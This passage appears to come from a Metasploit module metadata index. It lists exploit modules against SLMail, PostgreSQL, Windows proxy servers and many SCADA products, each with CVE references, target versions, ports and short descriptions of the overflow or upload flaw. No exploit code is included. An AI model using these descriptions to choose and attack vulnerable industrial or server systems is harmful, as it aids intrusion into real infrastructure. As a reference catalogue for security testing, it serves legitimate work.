is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior version of SLMail may also be vulnerable with this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.",
"references": [
"CVE-2003-0264",
"OSVDB-11975",
"BID-7519"
],
"platform": "Windows",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/2000/XP/2003 (SLMail 5.5)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/pop3/seattlelab_pass.rb",
"is_install_path": true,
"ref_name": "windows/pop3/seattlelab_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/postgres/postgres_payload": {
"name": "PostgreSQL for Microsoft Windows Payload Execution",
"full_name": "exploit/windows/postgres/postgres_payload",
"rank": 600,
"disclosure_date": "2009-04-10",
"type": "exploit",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>",
"todb <todb@metasploit.com>"
],
"description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\<version>\\data\" where <version> is the\n major.minor version of PostgreSQL). UDF DLL's may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.",
"references": [
"URL-http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql"
],
"platform": "Windows",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/postgres/postgres_payload.rb",
"is_install_path": true,
"ref_name": "windows/postgres/postgres_payload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/proxy/bluecoat_winproxy_host": {
"name": "Blue Coat WinProxy Host Header Overflow",
"full_name": "exploit/windows/proxy/bluecoat_winproxy_host",
"rank": 500,
"disclosure_date": "2005-01-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in a HTTP\n request.",
"references": [
"CVE-2005-4085",
"OSVDB-22238",
"BID-16147",
"URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinProxy <= 6.1 R1a Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb",
"is_install_path": true,
"ref_name": "windows/proxy/bluecoat_winproxy_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/ccproxy_telnet_ping": {
"name": "CCProxy Telnet Proxy Ping Overflow",
"full_name": "exploit/windows/proxy/ccproxy_telnet_ping",
"rank": 200,
"disclosure_date": "2004-11-11",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.",
"references": [
"CVE-2004-2416",
"OSVDB-11593",
"BID-11666",
"EDB-621"
],
"platform": "Windows",
"arch": "x86",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP SP0/1 - English",
"Windows XP SP2 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb",
"is_install_path": true,
"ref_name": "windows/proxy/ccproxy_telnet_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/proxypro_http_get": {
"name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",
"full_name": "exploit/windows/proxy/proxypro_http_get",
"rank": 500,
"disclosure_date": "2004-02-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2004-0326",
"OSVDB-4027",
"BID-9716"
],
"platform": "Windows",
"arch": "",
"rport": 3128,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Proxy-Pro GateKeeper 4.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/proxy/proxypro_http_get.rb",
"is_install_path": true,
"ref_name": "windows/proxy/proxypro_http_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/proxy/qbik_wingate_wwwproxy": {
"name": "Qbik WinGate WWW Proxy Server URL Processing Overflow",
"full_name": "exploit/windows/proxy/qbik_wingate_wwwproxy",
"rank": 400,
"disclosure_date": "2006-06-07",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.",
"references": [
"CVE-2006-2926",
"OSVDB-26214",
"BID-18312"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinGate 6.1.1.1077"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb",
"is_install_path": true,
"ref_name": "windows/proxy/qbik_wingate_wwwproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/abb_wserver_exec": {
"name": "ABB MicroSCADA wserver.exe Remote Code Execution",
"full_name": "exploit/windows/scada/abb_wserver_exec",
"rank": 600,
"disclosure_date": "2013-04-05",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-100324",
"ZDI-13-270",
"URL-http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": 12221,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ABB MicroSCADA Pro SYS600 9.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/abb_wserver_exec.rb",
"is_install_path": true,
"ref_name": "windows/scada/abb_wserver_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/advantech_webaccess_dashboard_file_upload": {
"name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload",
"full_name": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload",
"rank": 600,
"disclosure_date": "2016-02-05",
"type": "exploit",
"author": [
"rgod",
"Zhou Yu <504137480@qq.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.",
"references": [
"CVE-2016-0854",
"ZDI-16-128",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Advantech WebAccess 8.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/advantech_webaccess_webvrpcs_bof": {
"name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow",
"full_name": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof",
"rank": 400,
"disclosure_date": "2017-11-02",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>"
],
"description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"ZDI-17-938",
"CVE-2017-14016",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02"
],
"platform": "Windows",
"arch": "",
"rport": 4592,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31"
],
"mod_time": "2017-12-11 23:20:46 +0000",
"path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/citect_scada_odbc": {
"name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow",
"full_name": "exploit/windows/scada/citect_scada_odbc",
"rank": 300,
"disclosure_date": "2008-06-11",
"type": "exploit",
"author": [
"KF <kf_lists@digitalmunition.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.",
"references": [
"CVE-2008-2639",
"BID-29634",
"OSVDB-46105",
"URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability",
"URL-http://www.auscert.org.au/render.html?it=9433",
"URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 20222,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Citect32.exe v5.21 NT4",
"Citect32.exe v5.21 2K/XP",
"Citect32.exe v5.41-r0 NT4",
"Citect32.exe v5.41-r0 2K/XP",
"Citect32.exe v6.0-r0 2K/XP",
"CiExceptionMailer.dll v5.42 on XP Sp2 or SP3",
"CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2",
"CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3",
"CiExceptionMailer.dll v6.10 on XP Sp2 or SP3",
"CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3",
"CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1",
"CiExceptionMailer.dll v5.50-r0 XP SP2",
"CiExceptionMailer.dll v5.50-r0 2003 Server",
"Debug"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/scada/citect_scada_odbc.rb",
"is_install_path": true,
"ref_name": "windows/scada/citect_scada_odbc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/codesys_gateway_server_traversal": {
"name": "SCADA 3S CoDeSys Gateway Server Directory Traversal",
"full_name": "exploit/windows/scada/codesys_gateway_server_traversal",
"rank": 600,
"disclosure_date": "2013-02-02",
"type": "exploit",
"author": [
"Enrique Sanchez <esanchez@accuvant.com>"
],
"description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.",
"references": [
"CVE-2012-4705",
"OSVDB-90368",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 1211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal S3 CoDeSyS < 2.3.9.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb",
"is_install_path": true,
"ref_name": "windows/scada/codesys_gateway_server_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/codesys_web_server": {
"name": "SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow",
"full_name": "exploit/windows/scada/codesys_web_server",
"rank": 300,
"disclosure_date": "2011-12-02",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Celil UNUVER",
"TecR0c <roccogiovannicalvi@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Michael Coppola"
],
"description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.",
"references": [
"CVE-2011-5007",
"OSVDB-77387",
"URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt",
"EDB-18187",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-12-006-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"CoDeSys v2.3 on Windows XP SP3",
"CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/codesys_web_server.rb",
"is_install_path": true,
"ref_name": "windows/scada/codesys_web_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/daq_factory_bof": {
"name": "DaqFactory HMI NETB Request Overflow",
"full_name": "exploit/windows/scada/daq_factory_bof",
"rank": 400,
"disclosure_date": "2011-09-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.",
"references": [
"CVE-2011-3492",
"OSVDB-75496",
"URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-264-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 20034,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DAQFactory Pro 5.85 Build 1853 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/daq_factory_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/daq_factory_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/delta_ia_commgr_bof": {
"name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow",
"full_name": "exploit/windows/scada/delta_ia_commgr_bof",
"rank": 300,
"disclosure_date": "2018-07-02",
"type": "exploit",
"author": [
"ZDI",
"t4rkd3vilz",
"hubertwslin"
],
"description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.",
"references": [
"CVE-2018-10594",
"BID-104529",
"ZDI-18-586",
"ZDI-18-588",
"EDB-44965",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01"
],
"platform": "Windows",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"COMMGR 1.08 / Windows Universal"
],
"mod_time": "2018-10-08 14:15:21 +0000",
"path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/delta_ia_commgr_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/factorylink_csservice": {
"name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
"full_name": "exploit/windows/scada/factorylink_csservice",
"rank": 300,
"disclosure_date": "2011-03-25",
"type": "exploit",
"author": [
"Luigi Auriemma <aluigi@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found on Siemens FactoryLink 8. The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results arbitrary code execution.",
"references": [
"OSVDB-72812",
"URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 7580,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/factorylink_csservice.rb",
"is_install_path": true,
"ref_name": "windows/scada/factorylink_csservice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/factorylink_vrn_09": {
"name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow",
"full_name": "exploit/windows/scada/factorylink_vrn_09",
"rank": 200,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"hal",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. Originally found and posted by\n Luigi Auriemma.",
"references": [
"OSVDB-72815",
"URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 7579,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"FactoryLink 7.5",
"FactoryLink 7.5 SP2",
"FactoryLink 8.0.1.703"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb",
"is_install_path": true,
"ref_name": "windows/scada/factorylink_vrn_09",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/ge_proficy_cimplicity_gefebt": {
"name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",
"full_name": "exploit/windows/scada/ge_proficy_cimplicity_gefebt",
"rank": 600,
"disclosure_date": "2014-01-23",
"type": "exploit",
"author": [
"amisto0x07",
"Z0mb1E",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If\n the target does not have the WebClient service enabled, an external SMB service is necessary.",
"references": [
"CVE-2014-0750",
"ZDI-14-015",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb",
"is_install_path": true,
"ref_name": "windows/scada/ge_proficy_cimplicity_gefebt",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/iconics_genbroker": {
"name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01",
"full_name": "exploit/windows/scada/iconics_genbroker",
"rank": 400,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Lincoln",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n the memory allocations needed for the number of elements passed by the client.\n This results unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. Also, DEP bypass is supported.",
"references": [
"OSVDB-72817",
"URL-http://aluigi.org/adv/genesis_4-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 38080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/iconics_genbroker.rb",
"is_install_path": true,
"ref_name": "windows/scada/iconics_genbroker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/iconics_webhmi_setactivexguid": {
"name": "ICONICS WebHMI ActiveX Buffer Overflow",
"full_name": "exploit/windows/scada/iconics_webhmi_setactivexguid",
"rank": 400,
"disclosure_date": "2011-05-05",
"type": "exploit",
"author": [
"Scoot Bell <scott.bell@security-assessment.com>",
"Blair Strang <blair.strang@security-assessment.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2011-2089",
"OSVDB-72135",
"URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf",
"EDB-17240",
"URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6/7/8 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb",
"is_install_path": true,
"ref_name": "windows/scada/iconics_webhmi_setactivexguid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_igssdataserver_listall": {
"name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
"full_name": "exploit/windows/scada/igss9_igssdataserver_listall",
"rank": 400,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Lincoln",
"corelanc0d3r <peter.ve@corelan.be>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.",
"references": [
"CVE-2011-1567",
"OSVDB-72353",
"URL-http://aluigi.altervista.org/adv/igss_2-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_igssdataserver_listall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_igssdataserver_rename": {
"name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",
"full_name": "exploit/windows/scada/igss9_igssdataserver_rename",
"rank": 300,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma <aluigi@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n which results arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.",
"references": [
"CVE-2011-1567",
"OSVDB-72352",
"URL-http://aluigi.altervista.org/adv/igss_5-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 12401,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP2/R2 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_igssdataserver_rename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss9_misc": {
"name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",
"full_name": "exploit/windows/scada/igss9_misc",
"rank": 600,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. The initial approach is first by transferring our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.",
"references": [
"CVE-2011-1565",
"CVE-2011-1566",
"OSVDB-72354",
"OSVDB-72349",
"URL-http://aluigi.altervista.org/adv/igss_1-adv.txt",
"URL-http://aluigi.altervista.org/adv/igss_8-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP",
"Windows 7",
"Windows Server 2003 / R2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_misc.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_misc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss_exec_17": {
"name": "Interactive Graphical SCADA System Remote Command Injection",
"full_name": "exploit/windows/scada/igss_exec_17",
"rank": 600,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.",
"references": [
"CVE-2011-1566",
"OSVDB-72349",
"URL-http://aluigi.org/adv/igss_8-adv.txt"
],
"platform": "Windows",
"arch": "cmd",
"rport": 12397,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss_exec_17.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss_exec_17",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/indusoft_webstudio_exec": {
"name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution",
"full_name": "exploit/windows/scada/indusoft_webstudio_exec",
"rank": 600,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.",
"references": [
"CVE-2011-4051",
"OSVDB-77179",
"BID-50675",
"ZDI-11-330"
],
"platform": "Windows",
"arch": "",
"rport": 4322,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / 2003"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb",
